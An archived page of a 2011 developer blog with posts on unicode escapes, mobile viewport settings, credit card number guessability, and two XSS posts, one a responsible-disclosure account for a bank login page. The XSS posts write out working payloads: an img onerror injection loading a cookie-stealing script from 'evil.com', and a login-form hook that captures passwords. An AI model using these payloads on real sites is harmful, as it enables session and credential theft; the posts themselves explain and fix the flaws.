[philiptellis] /bb|[^b]{2}/
Never stop Grokking

Saturday, January 29, 2011

Printing unicode characters in web documents

I often have to look up reference sites to find out how to write a particular character in HTML, JavaScript or CSS when that character isn't on my keyboard. This post should save me some searching time in future.

To type a character that's not on your keyboard, you need its unicode codepoint in decimal or hexadecimal. In the examples below, HH means two hexadecimal digits, DD means two decimal digits, HHHH is four hexadecimal digits, and so on. DD+ means two or more decimal digits, HH+ means two or more hexadecimal digits.


To type out unicode characters in HTML, use one of the following:
  • &#DDD+;
  • &#xHHH+;
&#393; == Ɖ
&#x189; == Ɖ
&#x2021; == ‡


To type out unicode characters in JavaScript, use the following:
  • \uHHHH
‡ == \u2021


To print out a unicode character using CSS content, use the following:
  • \HH+
‡ == \2021
(Note: the CSS example that I've used here only works in browsers that support the :before pseudo-element and the content property, but in general you can use unicode escapes anywhere in CSS.)
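
The notations above can all be derived from a character's code point. The following is a minimal JavaScript sketch of that derivation; the helper name escapesFor is made up for this illustration, and it assumes a JavaScript engine that supports String.prototype.codePointAt and padStart.

```javascript
// Hypothetical helper: returns the HTML, JavaScript and CSS escape
// notations for the first character of the given string.
function escapesFor(ch) {
  const cp = ch.codePointAt(0);               // numeric code point
  const hex = cp.toString(16).toUpperCase();  // hexadecimal form
  return {
    htmlDecimal: "&#" + cp + ";",
    htmlHex: "&#x" + hex + ";",
    // \uHHHH only covers code points up to FFFF; beyond that,
    // ES2015 engines accept the \u{H+} form instead.
    js: cp <= 0xffff ? "\\u" + hex.padStart(4, "0") : "\\u{" + hex + "}",
    css: "\\" + hex,
  };
}

console.log(escapesFor("‡"));
// { htmlDecimal: '&#8225;', htmlHex: '&#x2021;', js: '\\u2021', css: '\\2021' }
```

In CSS, an escape that is followed by another hexadecimal digit needs a trailing space (or zero padding to six digits) so that the next character isn't read as part of the escape.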


URL context is different from HTML context, so I'm including it here.

To print a unicode character into a URL, you need to represent it in UTF-8, using the %HH notation for each byte.
‡ ==  %E2%80%A1
л ==  %D0%BB
' ==  %27
This is not something that you want to do by hand, so use a library to do the conversion. In JavaScript, you can use the encodeURI or encodeURIComponent functions to do this for you.
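
As a rough illustration, here is what the built-in functions produce for a few characters. The percentEncodeUtf8 helper is a made-up name for this sketch; it encodes every byte unconditionally, which is useful for seeing the raw UTF-8 bytes but is not what you would normally put in a URL. It assumes an environment with a global TextEncoder (modern browsers and Node.js).

```javascript
// Built-in: encodes everything except unreserved URL characters.
console.log(encodeURIComponent("‡"));  // %E2%80%A1
console.log(encodeURIComponent("л"));  // %D0%BB

// Built-in: like encodeURIComponent, but leaves URL syntax (:/?=& etc.) alone.
console.log(encodeURI("http://example.com/a b?q=л"));
// http://example.com/a%20b?q=%D0%BB

// Hypothetical helper: percent-encode every UTF-8 byte of a string.
function percentEncodeUtf8(str) {
  const bytes = new TextEncoder().encode(str);
  return Array.from(bytes, function (b) {
    return "%" + b.toString(16).toUpperCase().padStart(2, "0");
  }).join("");
}

console.log(percentEncodeUtf8("‡"));  // %E2%80%A1
```

Note that encodeURIComponent leaves a handful of punctuation characters, including the apostrophe, unescaped, so it should not be relied on as a quoting mechanism for other contexts.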

End notes

Use escape sequences only in two cases.
  1. Your editor or keyboard doesn't allow you to type the characters in directly.
  2. The characters could be misinterpreted as syntax, eg < or > in HTML.

References and Further Reading

  1. List of Unicode Characters on Wikipedia
  2. UTF-8 on Wikipedia
  3. Unicode and HTML on Wikipedia
  4. JavaScript Unicode Escape Sequences on Mozilla Developer Network
  5. Richard Ishida. 2005. Using Character Escapes in Markup and CSS in W3C Internationalisation.

Tuesday, January 25, 2011

device-width and how not to hate your users

I've been catching up on my technical reading, and this weekend was spent on Responsive Enhancement[1]. I'd read about it before on Jeremy Keith's blog and his comments on proportion perfection over pixel perfection[2] made me think. Finally, Kayla's report[3] on Smashing Magazine about responsive web design coming up as I was thinking about making bluesmoon.info more mobile friendly is what prompted me to study it in detail.

I'm not going to go into the details of responsive enhancement, the references at the end of this article serve that purpose. This article lists what I think are best practices and my reasons for them.

@media queries

As a web designer or developer, you want your page to be easily viewable across different devices and screen sizes. It shouldn't matter whether your user uses a 21" desktop monitor, a 13" laptop, a 10" iPad or a much smaller smartphone. Responsive web design uses @media queries to change the layout of the page using CSS based on browser width. You might have CSS that looks like this:
/* Default wide-screen styles */

@media all and (max-width: 1024px) {
    /* styles for narrow desktop browsers and iPad landscape */
}

@media all and (max-width: 768px) {
    /* styles for narrower desktop browsers and iPad portrait */
}

@media all and (max-width: 480px) {
    /* styles for iPhone/Android landscape (and really narrow browser windows) */
}

@media all and (max-width: 320px) {
    /* styles for iPhone/Android portrait */
}

@media all and (max-width: 240px) {
    /* styles for smaller devices */
}
And yes, you could go smaller than that, or have intermediate sizes, but I'll cover that later.


Now this works reasonably well when you resize desktop browsers[4], but not so much for mobile browsers. The problem is that mobile browsers (iPhone/Safari, Android/Chrome and Fennec) assume that the page was designed for a wide screen, and shrink it to fit into the smaller screen. This means that even though users could have had a good customised experience for their smaller devices, they won't, because the device doesn't know about this[5]. The trick is to use Apple's viewport[6, 7, 8] meta tag in your document's head in conjunction with @media queries[9]:
<meta name="viewport" content="...">
I've left the content attribute empty for now because this is where I see confusion... which is what we'll talk about now.
width=device-width
Most sites that I've seen advise you to set the content attribute to width=device-width. This tells the browser to assume that the page is as wide as the device. Unfortunately, this is only true when your device is in the portrait orientation. When you rotate to landscape, the device-width remains the same (eg: 320px), which means that even if your page were designed to work well in a 480px landscape design, it would still be rendered as if it were 320px.

It's tempting to use the orientation media query to solve this problem, but orientation doesn't really tell you the actual width of the device. All it tells you is whether the width is larger than or smaller than the device's height. As ppk points out[5], since most pages tend to scroll vertically, this is irrelevant.

Use this if you use the same page styles in portrait and landscape orientation. Also note that using width=device-width is the only way to tell Android devices to use the device's width[12].
initial-scale=1
Setting initial-scale=1 tells the browser not to zoom in or out regardless of what it thinks the page width is. This is good when you've designed your page to fit different widths since the browser will use the appropriate CSS rules for its own width, and initial-scale stops the zooming problem that we faced without the viewport meta tag.

Unfortunately a bug, or more likely a misfeature, in Mobile Safari messes this up when a device is rotated from portrait to landscape mode. initial-scale is honoured only on full page load. On rotate from portrait to landscape mode, the browser assumes that the page width stays the same and scales accordingly (1.5) to make 320 pixels fit into 480 pixels. However, as far as @media queries go, it reports a 480px width, and uses the appropriate CSS rules to render the page. This results in a page designed for 480px rendered scaled up 1.5 times. It's not horrible, but it's not desirable. Fennec claims[8] that it does the right thing in this case. The Android emulator is impossible to work with and I haven't tested on mobile Opera yet.

To get around this bug, the pixel perfection camp suggests also setting maximum-scale=1. This stops the page from zooming in on rotate, but it has the undesired side effect of preventing the user from zooming the page. This is a problem from the accessibility point of view. Zooming in is a very valid use case for users with bad eyesight, and in some cases, even users with good eyesight who just want a closer look at some part of your page. Do this only if you hate your users. It goes without saying that user-scalable=no should also not be used on most general purpose pages.

A better solution may be to design your page to use the same styles in portrait and landscape orientation and set width=device-width. This way even if it does zoom, it will still be proportionate. See Lanyrd[10] for an example of this design.
width=<actual width>
Some sites advise using a specific viewport width and designing your pages for that width. This is fine if you're building a separate page for each device class, but that doesn't flow with the concept of responsive design. Fixed width layouts are for print. The web is fluid and adapts to its users. Your site should too. Don't use this.
@media all and (device-width:480)
While this is a media query rather than an option to the viewport meta tag, I've seen it at various locations, and don't think it's the best option around. Here's why. According to the CSS3 media queries spec[11], the device-width media feature describes the width of the rendering surface of the output device. For continuous media, this is the width of the screen. For paged media, this is the width of the page sheet size.

We're dealing with continuous media here (on-screen as opposed to printed), in which case the spec states that this is the width of the screen. Unless the browser window is maximised, this might be larger than the viewport width. My tests show that most desktop browsers treat device-width and width as synonyms. Mobile browsers seem a little confused on the matter. As far as the viewport meta tag goes, device-width is the width of the device in portrait orientation only. For a 320x480 device, device-width is always 320px regardless of orientation. For CSS media queries, however, device-width is the width of the screen based on its current orientation.

If you are going to use this, use it in conjunction with the orientation media feature. Never use max-device-width and min-device-width. It's better to use max-width and min-width instead. Also remember that device widths may change with newer models. You want your design to be future proof.

Intermediate widths

I'd mentioned above that you could design for any number of widths. The important thing is to test your page for different browser widths. This is fairly easy to do just by resizing your browser window. Test, and whenever you find your page layout break, either fix the layout for all widths, or build a new layout for smaller widths.

On bluesmoon.info, I change many parts of the page depending on page width. The default design (at the time of this article) has 5% empty space around the content. This is fine for really wide screens (1152px or more), but as you get smaller, the empty space becomes a waste. Below 1152px, I shrink this to 2% and below 1024px, I get rid of it completely. You could say that my page content was really built for 1024px. This design also works for the iPad in landscape mode.

Below 1000px, all 3 column pages switch to a 2 column layout. Below 580px, I move the right column on all pages below the main content. All pages that initially had 3 columns now have 2 columns below the main content.

As we get smaller, I reduce the space used by non-essential content like the footer, the sidebars and the menu at the top, leaving as much space as possible for main content. Finally, when we get below 380px, the whole page turns into a single column layout.
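
To make the breakpoints easier to see at a glance, here is the same set of decisions written as a small JavaScript function. This is only a model for illustration: the function and property names are made up, and on the real page these rules live in CSS @media blocks rather than in script.

```javascript
// Hypothetical model of the width-based layout decisions described above.
// width is the viewport width in CSS pixels.
function describeLayout(width) {
  let margin;
  if (width >= 1152) {
    margin = "5%";       // really wide screens keep the empty space
  } else if (width >= 1024) {
    margin = "2%";       // below 1152px the space shrinks
  } else {
    margin = "0";        // below 1024px it goes away completely
  }

  return {
    margin: margin,
    threeColumnPagesCollapsed: width < 1000, // 3 column pages become 2 column
    rightColumnBelowMain: width < 580,       // right column moves under content
    singleColumn: width < 380,               // everything stacks in one column
  };
}

console.log(describeLayout(480));
```

Writing the thresholds out like this is also a handy checklist of the widths to test when resizing the browser window.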

This is, of course, just an example. Your own site may have a layout that works perfectly at all screen widths, or you may need to design only two or three layouts. It's easy to test and design, so there's no reason not to. Designing for multiple widths took me just a couple of hours, and a lot of it was spent reading the articles below.


So finally, this is what I recommend.
  1. DO use the viewport meta tag
  2. DO use media queries to render your page appropriately for various widths ranging from under 200px to 1024px or more
  3. DO use width=device-width,initial-scale=1 in your viewport meta tag OR use width=device-width alone[12].
  4. DO NOT use maximum-scale=1 or user-scalable=no
  5. DO NOT use width=<specific width>
  6. DO NOT use @media all and (*-device-width: xxx)

Remember that using initial-scale=1.0 leaves you open to a zooming bug in Mobile Safari. Push Safari to fix this bug. Finally, David Calhoun has a great summary[13] of all options to the viewport meta tag, and alternate meta tags for older phones. Well worth a read. Also note that Mozilla's documentation[8] of the viewport meta tag is far better than Safari's[7].

Footnotes & References

  1. Ethan Marcotte. 2010. Responsive Web Design. In A List Apart #306. ISSN: 1534-0295.
  2. Jeremy Keith. 2010. Responsive Enhancement. In adactio.
  3. Kayla Knight. 2011. Responsive Web Design: What It Is and How To Use It. In Smashing Magazine.
  4. Webkit based desktop browsers re-render the page correctly as you resize the browser, however they have a minimum width of 385px (on MacOSX) and I was unable to shrink the browser below this. Firefox 4 re-renders the page correctly until the width gets too narrow to fit the navigation toolbar. At that point the viewport width stays fixed even if you shrink the browser. The page is re-rendered if you type something (anything) into the URL bar. Opera 10/11 re-render correctly at all sizes.
  5. Peter Paul Koch. 2010. A tale of two viewports — part two. In Quirksmode.
  6. Using the Viewport on Safari. In Safari Web Content Guide.
  7. The viewport meta tag. In Safari HTML Reference.
  8. MDC. 2010. Using the viewport meta tag to control layout on mobile browsers. In Mozilla Developer Network.
  9. Peter Paul Koch. 2010. Combining meta viewport and media queries. In Quirksmode.
  10. Willison & Downe. Lanyrd.
  11. Lie et al. 2010. Media Queries. W3C Candidate Recommendation 27 July 2010.
  12. If you design your page for the narrow view and expect it to scale when rotated, then use width=device-width and nothing else. If, instead, you design your page for either width, then use width=device-width,initial-scale=1. This is the only way to get the Android browser to render a page with the intended width. Mobile Safari will render the page exactly as if initial-scale=1 were specified alone. You will still end up with the zoom on rotate bug.
  13. David Calhoun. 2010. The viewport metatag (Mobile web part I).

Friday, January 21, 2011

How guessable is your credit card number?

I just saw an article over at Mint that explains what each digit in a credit card is used for. It's a short read, but very well presented. Go read it now, then come back here.

So I got to thinking. The first 6 digits of my card are based on the type of card I have, and the entire lookup is available online. The last 4 digits are generally printed on credit card receipts. Now for most credit cards that have an 8 or 9 digit account number, this leaves 5 or 6 unknown digits. In the worst case that's a million possibilities. This isn't the worst case though, because we know the checksum, which is the last digit, and shows up on credit card receipts. Using the Luhn algorithm, we can reduce the search space by 90%. This leaves 100,000 possibilities for the unknown 6 digit number. If you have an 8 digit account number, then the space reduces to 10,000 possibilities.
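
Here's a quick way to check that arithmetic. This sketch implements the Luhn check and counts how many candidate numbers pass it for a given prefix and last four digits. The prefix and last four digits used below come from the well known test number 4111111111111111, not from a real card, and the function names are made up for this example.

```javascript
// Luhn check: walking from the rightmost digit, double every second digit,
// subtract 9 from any result above 9, and require the total to be a
// multiple of 10.
function luhnValid(number) {
  let sum = 0;
  for (let i = 0; i < number.length; i++) {
    let d = number.charCodeAt(number.length - 1 - i) - 48; // digit value
    if (i % 2 === 1) {
      d *= 2;
      if (d > 9) d -= 9;
    }
    sum += d;
  }
  return sum % 10 === 0;
}

// Count how many fillings of the unknown middle digits pass the Luhn check.
function countCandidates(prefix, lastFour, unknownDigits) {
  let count = 0;
  const total = Math.pow(10, unknownDigits);
  for (let n = 0; n < total; n++) {
    const middle = String(n).padStart(unknownDigits, "0");
    if (luhnValid(prefix + middle + lastFour)) count++;
  }
  return count;
}

console.log(countCandidates("411111", "1111", 6)); // 100000
console.log(countCandidates("411111", "1111", 5)); // 10000
```

The count is exact rather than approximate: once all but one of the unknown digits are chosen, exactly one value of the remaining digit makes the checksum work out.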

It takes a computer very little time to generate that many numbers.

Thursday, January 20, 2011

Sometimes you need to wash twice

When conversing across languages, information is sometimes lost in translation.

The problem I'll talk about today deals with the different ways in which quotes can be represented in different contexts, in particular, when passing data across language boundaries. Let's look at some code.
<?php
   $s = filter_var($_GET['s'], FILTER_SANITIZE_SPECIAL_CHARS);
?>
<script>
   var s = "<?php echo $s; ?>";

   var div = document.getElementById("content");
   div.innerHTML = s;
</script>
From the HTML perspective, this code appears clean. Data from the URL parameter s needs to be written out to HTML and we're applying a suitable filter to it to make it safe for use in that context. This code would be fine if we were passing the data directly from PHP to HTML, but that's not what we're doing here.

Testing this code out with the usual suspects (<>&"') shows that it's safe. You can neither insert HTML into the div, nor can you insert JavaScript by getting out of the quotes, since all double quotes in the input data are converted to &#34; (and single quotes to &#39;).

It seems that the worst that we can do here is to break the JavaScript by throwing a \ into the end of s. The output of our PHP becomes:
   var s = "...\";

   var div = document.getElementById("content");
   div.innerHTML = s;
The result is that our JavaScript terminates with an error after line 1, and that's the end of it... but maybe not.

The \ gives us a clue. In JavaScript, all characters are unicode, and we can represent any character by its unicode equivalent using the \u<codepoint> escape sequence. This still doesn't help us get out of the quotes in JavaScript, but it does mess around with the innerHTML.

What we're doing in the innerHTML assignment is assigning a string to a div's innerHTML property, and then the browser goes ahead and renders that string as if it were HTML. In essence, innerHTML is to HTML what eval() is to JavaScript and PHP — a bad idea.

We can now craft a string made completely using the unicode escape sequences for JavaScript. For example, \u003cscript+src\u003d\u0022http://evil.com/cookie-steal.js\u0022\u003e\u003c/script\u003e

When assigned to the innerHTML, it turns into the following HTML:
<script src="http://evil.com/cookie-steal.js"></script>
Fortunately, browsers won't execute script nodes that were added using innerHTML. They will, however execute inline events on elements added through innerHTML, so we do this instead:
\u003cimg+src\u003dblah+onerror\u003d\u0022s=document.createElement(\u0027script\u0027);s.src\u003d\u0027http://evil.com/cookie-steal.js\u0027;document.body.appendChild(s);\u0022\u003e, which translates to the following HTML (indented for readability):
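<img src=blah
     onerror="s=document.createElement('script');s.src='http://evil.com/cookie-steal.js';document.body.appendChild(s);">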
The JavaScript fires in most cases. To get it to fire in all cases, you also need to attach to the onload event.

So, what's the fix here?

To think about the fix, we need to think about context, and every place this user data is being used. Depending on the actual use case, our fix may involve just one change, or several changes to the above code. One change is mandatory though:
<?php
   $s = filter_var($_GET['s'], FILTER_SANITIZE_SPECIAL_CHARS);
?>
<script>
   var s = <?php echo json_encode($s); ?>;

   var div = document.getElementById("content");
   div.innerHTML = s;
</script>
The json_encode function returns a quoted JavaScript string. It correctly escapes all characters within that string that are special to JavaScript, so in our case, \u00xx turns into \\u00xx. Note that addslashes is insufficient as it does not escape newline characters which are valid inside PHP strings.
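
The difference can be reproduced without PHP. In the sketch below, JSON.stringify stands in for PHP's json_encode, and JSON.parse stands in for the JavaScript parser reading a string literal out of the page source. Both substitutions are assumptions made for the sake of a self-contained demo; the variable names are made up too.

```javascript
// What the attacker sends: a literal backslash followed by u003c and so on.
const raw = "\\u003cimg src\\u003dblah\\u003e";

// Naive approach: drop the text between double quotes. When the resulting
// literal is parsed, the \u escapes are decoded into real markup.
const naive = JSON.parse('"' + raw + '"');
console.log(naive);        // <img src=blah>

// Encoding approach: the backslashes themselves get escaped, so parsing
// the literal gives back exactly the characters the user sent.
const literal = JSON.stringify(raw);
const roundTripped = JSON.parse(literal);
console.log(literal);      // "\\u003cimg src\\u003dblah\\u003e"
console.log(roundTripped); // \u003cimg src\u003dblah\u003e
```

With the encoded version, assigning the string to innerHTML shows the backslash sequences as plain text instead of creating an img element.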

Two things to learn from this:
  1. When passing untrusted data across language boundaries, you may need to sanitize it multiple times
  2. innerHTML is the eval of HTML

Saturday, January 01, 2011

Fixing the XSS on ICICIDirect.com

I tried logging in to my ICICIDirect account over Christmas and realised that I'd forgotten my username (I still remembered the password though). While entering the wrong username, I also noticed that I was being redirected to the following URL:
Notice the error message showing up in the URL. Curiosity got the better of me and I tried playing around with the URL and found that it was open to an XSS. I sent the following message to their helpdesk:

I've found a security hole on your login page. Please put me in touch with someone responsible for the security of your page so I can explain the problem to them and get it fixed.

and then tweeted about the existence of the XSS without providing any details. Pretty soon others figured it out as well.

Now this was on Sunday the 26th, and no one at ICICI was checking emails, but on Monday I received a phone call from Abhishake Mathur, the head of customer service. He called on the phone number registered with my account. I tried to explain the concept of a cross-site-scripting bug to him and that an evil person could use it to steal a user's password, but it wasn't easy. He kept telling me that when I visit their site I should see the lock icon (referring to the SSL lock that some browsers display for sites served over HTTPS) and that as long as I saw that, no one could steal my password. I asked him to email me from his official address so that I could reply and demonstrate the problem along with screenshots and links.

I received no emails. He did call back a few times with questions from his technical team and from someone he called his senior, but these people were either not allowed to speak to me directly or did not want to. I can imagine that some companies only like PR or Customer Support to interact directly with users. We at Yahoo! have an official security contact and all security related communication is done through that channel; however, the people behind that channel are all highly technical and qualified in the security field.

In any event, I headed out early that evening, and was not home when they called a few more times. I left word at home that if they called, they should be asked to email me. That night I still hadn't received an email. The following morning they called while I was in the shower and my dad asked them to call back a little later. When I got out, there was an email in my inbox essentially asking me to describe the problem I was facing.

I replied with the following:
Hi Abhishake,

Thank you for getting back to me. I'll explain the problem in detail. First let's define three entities.

1. The real user, we shall call this person Ashish
2. Your website, we shall refer to this as ICICIDirect
3. The attacker, we shall call this person Bala

Now, in this scenario, Bala sends an email to Ashish pretending to come from ICICIDirect. Note, this is similar to, but different from, a normal phishing email, since in this email he includes a real URL to ICICIDirect. It would look something like this:

Dear User,

Please log in to ICICIDirect here.

Thank you,


Of course, it might have more details to make it look authentic. Now if you check the link, you will see that it points to this URL:

This is a link on the ICICIDirect website as you can see, it starts with https://secure.icicidirect.com/ and is running on your own servers. Now if you click on the link, it will show you a page that looks like this:
[Screenshot: ICICIDirect - login]

This page is exactly the same as your login page because it is your login page. However, if you try to login (for this example, please log in with a fake password since it will be displayed), then you will get something like this:


For this example, I have only displayed the password in a JavaScript popup, but a real attacker like Bala in our example would send this username and password to their own server using a beacon.

The reason this thing happens is because the "errmsg" parameter that is passed in the URL of the page is not sanitized to make sure it is safe. By default you pass in error messages like "Invalid User Name or Password", but an attacker can change this message to anything exactly like I have done in this example. They can add JavaScript to this parameter and get it inserted into your page.

If you do a view source on the link that I sent you, you will see the following code in there:
setTimeout(function() {var e=document.getElementsByName('FML_USR_USR_PSSWRD')[0];
 e.form.onsubmit=function() {alert('password is ' + e.value);
 return false;};},2000);

This was added by manipulating the "errmsg" parameter.

Although there are better ways to accomplish what you need to do, the immediate way to fix this is to validate the errmsg parameter to make sure it only contains safe values. This means that there should be no <, >, &, " or ' characters in this parameter. In ASP you can do this using the Server.HtmlEncode method to clean the errmsg parameter. For a more detailed analysis of cross site scripting in ASP, have a look at this document: http://www.4guysfromrolla.com/webtech/112702-1.2.shtml

I hope this explains the problem completely. The example I have shown is fairly benign, but a real bad person could do worse things. Feel free to get back to me if you have more questions. As a user of ICICIDirect, I am very interested in making sure it is secure.

Thank you,
I received a reply in under an hour saying that their technical team was looking into the matter and then three hours later another email saying that the issue was fixed and asking if I could verify.

I checked, and they had indeed fixed the immediate problem. They still weren't sanitizing the input; instead they went one step further and completely ignored it. The initial problem was that they were echoing the value of the errmsg parameter untreated. Their solution was to treat the errmsg parameter as a boolean and echo a fixed error message of Invalid Login Id or Password:Please try again. if the parameter was set to any value.

This fixes the immediate issue, but given that they haven't considered input filtering, chances are that there are similar bugs elsewhere on the site that still exist.
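
For reference, the kind of output encoding I had suggested looks roughly like this. The sketch is in JavaScript rather than ASP, the function name is made up, and it is not what ICICIDirect deployed; it only shows the idea of encoding the five characters listed in my email before echoing a parameter into HTML.

```javascript
// Hypothetical helper: encode the characters that are special in HTML so
// that untrusted text is displayed rather than interpreted as markup.
function escapeHtml(text) {
  const map = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
  };
  return String(text).replace(/[&<>"']/g, function (c) {
    return map[c];
  });
}

console.log(escapeHtml("<script>alert('x')</script>"));
// &lt;script&gt;alert(&#39;x&#39;)&lt;/script&gt;
```

This only makes text safe for an HTML context. As the post on washing twice shows, data that ends up inside a JavaScript string or a URL needs the encoding that is appropriate for that context as well.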